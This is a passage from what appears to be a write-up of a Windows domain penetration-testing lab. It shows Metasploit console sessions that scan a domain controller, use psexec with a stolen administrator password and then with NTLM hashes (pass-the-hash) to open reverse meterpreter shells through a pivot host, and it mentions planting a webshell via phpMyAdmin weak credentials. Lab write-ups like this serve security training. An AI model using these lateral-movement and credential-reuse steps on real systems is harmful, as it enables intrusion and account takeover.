You can use the SYN scanner instead; I only fell back to tcp because I had started msfconsole without root, and the SYN scanner needs raw sockets (embarrassing). Through a pivot the connect scanner is the one that works anyway, since only full TCP connections can be relayed over the session.

A TCP connect scan is slow, so I only scan the ports that matter (RHOSTS was set to the DC, 192.168.52.138, beforehand; that command is not in the transcript):

msf6 auxiliary(scanner/portscan/tcp) > set PORTS 3389,445
PORTS => 3389,445
msf6 auxiliary(scanner/portscan/tcp) > run
[+] 192.168.52.138: - 192.168.52.138:445 - TCP OPEN
[*] 192.168.52.138: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

3389 is closed, so RDP is out; SMB is open, so use the SMB module (psexec with the domain admin credentials):

msf6 auxiliary(scanner/portscan/tcp) > use exploit/windows/smb/psexec
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 exploit(windows/smb/psexec) > set RHOSTS 192.168.52.138
RHOSTS => 192.168.52.138
msf6 exploit(windows/smb/psexec) > set SMBUser Administrator
SMBUser => Administrator
msf6 exploit(windows/smb/psexec) > set SMBPass qwe@123
SMBPass => qwe@123
msf6 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set LHOST 192.168.52.143
LHOST => 192.168.52.143
msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 192.168.52.143:4444 via the meterpreter on session 4
[*] 192.168.52.138:445 - Connecting to the server...
[*] 192.168.52.138:445 - Authenticating to 192.168.52.138:445 as user 'Administrator'...
[*] 192.168.52.138:445 - Selecting PowerShell target
[*] 192.168.52.138:445 - Executing the payload...
[+] 192.168.52.138:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (203846 bytes) to 192.168.52.138
[*] Meterpreter session 5 opened (192.168.52.138:4444 -> 192.168.52.138:55687 via session 4) at 2026-03-27 15:32:59 +0800

meterpreter >

A pitfall I hit: I first set LHOST to 192.168.111.25 and the session never came back. The reason is simple:

  • With the route in place we can reach the DC, but the DC cannot reach us: it only sits on 192.168.52.0/24 and has no path to 192.168.111.x, let alone to the attacker's VPN address, so a reverse payload has nowhere to connect.

Fix: set LHOST to the pivot's internal address (192.168.52.143).

Because the route exists, MSF starts the handler through the pivot session instead of on a local interface:

[*] Started reverse TCP handler on 192.168.52.143:4444 via the meterpreter on session 4

The DC connects to the pivot on 192.168.52.143:4444, and the meterpreter on the pivot relays that connection back to MSF, so the shell arrives naturally. (A bind payload, windows/x64/meterpreter/bind_tcp, avoids the question entirely: MSF would connect to the DC through the route instead.)

VI. Finding the flag

Use meterpreter's search to locate the flag:

meterpreter > search -f flag*
Found 2 results...
==================

Path                                                                         Size (bytes)  Modified (UTC)
----                                                                         ------------  --------------
c:\Users\liukaifeng01\AppData\Roaming\Microsoft\Windows\Recent\flag.txt.lnk  515           2025-12-21 14:37:59 +0800
c:\flag.txt                                                                  32            2025-12-21 14:38:28 +0800

Then read it with cat:

meterpreter > cat c:\\flag.txt

Another pitfall: in the meterpreter console the backslash is an escape character.

The console splits the command line the way a POSIX shell does (Metasploit uses Ruby's Shellwords), so a single \ outside quotes escapes the character after it and is dropped: c:\flag.txt reaches the command as c:flag.txt, not as a path.

So do not write a Windows path as:

C:\Users\Administrator\Desktop\flag.txt

Write it as:

C:\\Users\\Administrator\\Desktop\\flag.txt

Wrapping the path in double quotes also keeps the backslashes intact ("C:\Users\Administrator\Desktop\flag.txt"), since inside double quotes only \", \\, \$ and \` are treated as escapes.

VII. Other approaches

At several points the solution is not unique.

1. Getting onto the DC

Where we dumped credentials we saw not only the plaintext but also the hashes:

Username       Domain  LM                                NTLM                              SHA1
--------       ------  --                                ----                              ----
Administrator  GOD     d29aa94631a1dca1aad3b435b51404ee  933a9b5b44dab4530d86d83a6b47b7d1  c3e55f8634feec6635faef5eba3b04a9b08e5ed9
STU1$          GOD                                       c8175d606297e4f2feebbbda926cd9f7  b328ba45ca1570739b04ba3cb235a5ce245dd30f

The plaintext is not needed: logging in with the NTLM hash (pass-the-hash) works too. psexec takes SMBPass in LM:NTLM form, and the empty LM value aad3b435b51404eeaad3b435b51404ee is fine in place of the real one because NTLM authentication only uses the NT half:

msf6 auxiliary(scanner/portscan/tcp) > use exploit/windows/smb/psexec
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 exploit(windows/smb/psexec) > set SMBUser Administrator
SMBUser => Administrator
msf6 exploit(windows/smb/psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:933a9b5b44dab4530d86d83a6b47b7d1
SMBPass => aad3b435b51404eeaad3b435b51404ee:933a9b5b44dab4530d86d83a6b47b7d1
msf6 exploit(windows/smb/psexec) > set RHOSTS 192.168.52.138
RHOSTS => 192.168.52.138
msf6 exploit(windows/smb/psexec) > options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share


   Used when connecting via an existing SESSION:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   no        The session to run this module on


   Used when making a new connection via RHOSTS:

   Name       Current Setting                                                    Required  Description
   ----       ---------------                                                    --------  -----------
   RHOSTS     192.168.52.138                                                     no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      445                                                                no        The target port (TCP)
   SMBDomain  .                                                                  no        The Windows domain to use for authentication
   SMBPass    aad3b435b51404eeaad3b435b51404ee:933a9b5b44dab4530d86d83a6b47b7d1  no        The password for the specified username
   SMBUser    Administrator                                                      no        The username to authenticate as


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.52.143   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 192.168.52.143:4444 via the meterpreter on session 4
[*] 192.168.52.138:445 - Connecting to the server...
[*] 192.168.52.138:445 - Authenticating to 192.168.52.138:445 as user 'Administrator'...
[*] 192.168.52.138:445 - Selecting PowerShell target
[*] 192.168.52.138:445 - Executing the payload...
[+] 192.168.52.138:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (203846 bytes) to 192.168.52.138
[*] Meterpreter session 6 opened (192.168.52.138:4444 -> 192.168.52.138:55770 via session 4) at 2026-03-27 16:04:02 +0800

meterpreter >

2. Port 80

Besides EternalBlue, port 80 on the pivot is also an entry point:

[image: file-20260327160525073]

Directory scan:

┌──(zyf㉿kali)-[~/sechelper]
└─$ ffuf -u http://192.168.111.20/FUZZ -w /usr/share/seclists/Discovery/Web-Content/combined_directories.txt -s
phpmyadmin

The admin interface turns up:

[image: file-20260327160904258]

Weak credentials:

  • username: root
  • password: root

From there you write a webshell through MySQL commands and connect with AntSword (蚁剑) ...

Plenty of people have written that part up in detail, so I won't repeat it.

3. About C2

This write-up does not use a C2. For simply clearing the lab it isn't really necessary, but if you want to get used to the workflow of a real engagement it is worth going through.

Using a C2 on this lab has also been written up by many others, so again I won't repeat it.